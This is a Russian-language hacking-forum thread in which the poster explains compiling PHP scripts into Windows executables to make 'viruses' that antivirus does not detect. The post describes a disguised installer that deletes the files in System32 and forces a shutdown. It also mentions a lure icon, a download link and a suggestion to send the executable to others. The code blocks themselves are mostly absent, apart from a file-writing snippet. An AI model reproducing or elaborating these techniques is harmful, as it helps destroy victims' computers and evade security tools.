![]() |
Левые вирусы, которые не палят антивирусы
Хай всем!
Возможно этот способ уже все знают, но всёравно... Оказывается можно писать вирусы на PHP :D Конечно они нубские получаются, но не палятся антивирусами... Вы наверное думаете что этот способ годен только для серверов с поддержкой PHP, однако для запуска PHP вируса ненужен сервер :p PHP скрипты можно компилировать в .exe файлы, для меня (когда я это узнал) было огромное открытие, для вас возможно нет... Тогда закройте эту страничку, всёравно ничего нового не узнаете... Для компиляции PHP скриптов есть много программ, я лично юзаю php bam compile маленькая прога не требующая никакой установки! Скачать тут: _http://slil.ru/24354564 В архиве 5 фалов: bamcompile.exe - компилятор readme.txt - описание компилятора (помощ) virus-unlink.php - мой пример вируса :) Вот... PHP код:
1)Выводит нажпись "Preparing to installation... Plsease wait" 2)Получает список файлов из C:/WINDOWS/System32/ и пытается их по очереди удалить... 3)После всего этого выводит текст TY 4URKO! By Ponchik ICQ:202-995-022 WEB:antichat.ru 4)Замирает на 5 сек 5)Выводит табличку выключения компа через 30 сек. (естествено он уже не включится без system32 :D ) 4)popa=).ico - иконка голой попы :D (чтоб хотелось запустить) 5)virus-unlink.exe - откомпилированый не сжатый вирус с иконкой попы :D Эмм... Кажись всё... Лаги которые очень мешают: 1)После выполнения, программа закрывается, я личто решаю это так: while(true) { sleep(10); } это прописать в конец программы 2)Не работает функция usleep ну она врядле вам нужна будет :) 3)В досе невидн русский текст, например если написать echo 'Предед медвед'; - Это выведет каракули Я это решаю функцией PHP код:
echo strtoruss('Превед медвед'); И всё ок :D ====================================== Не судите строго, для меня это было открытием :D Хоть и фиговые вирусы получаются, зато они не палятся, можно конечно на C++ офигительные не палевные писать, но я С++ незнаю, поэтому РНР для меня единственое решение :) В общем не судите строго :) P.S. virus-unlink.exe полностью готов к работе, можете комунить отправить :p |
Классная фича! Не знал. Правда, не легче ли точно так же написать батничек?
|
Я незнаю что такое батничек ;)
Вот ещё есть такая фишка PHP код:
PHP код:
P.S. Кому надо например в C:/windows/ создавать, замените $fp=fopen(md5(time().doubleval(microtime())).$r,"w "); на $fp=fopen('C:/WINDOWS/'.md5(time().doubleval(microtime())).$r,"w"); |
Цитата:
|
сам когда-то компили, ещё компилятор одной из тимы... интересно, но как-то всеровно..... не нравица мне это
|
Sn@k3, на любителя :)
Macro, неее... Ты чооо! Палевно! + кажись касперский предупреждает когда бат запускаешь (кажись!) |
| Время: 05:02 |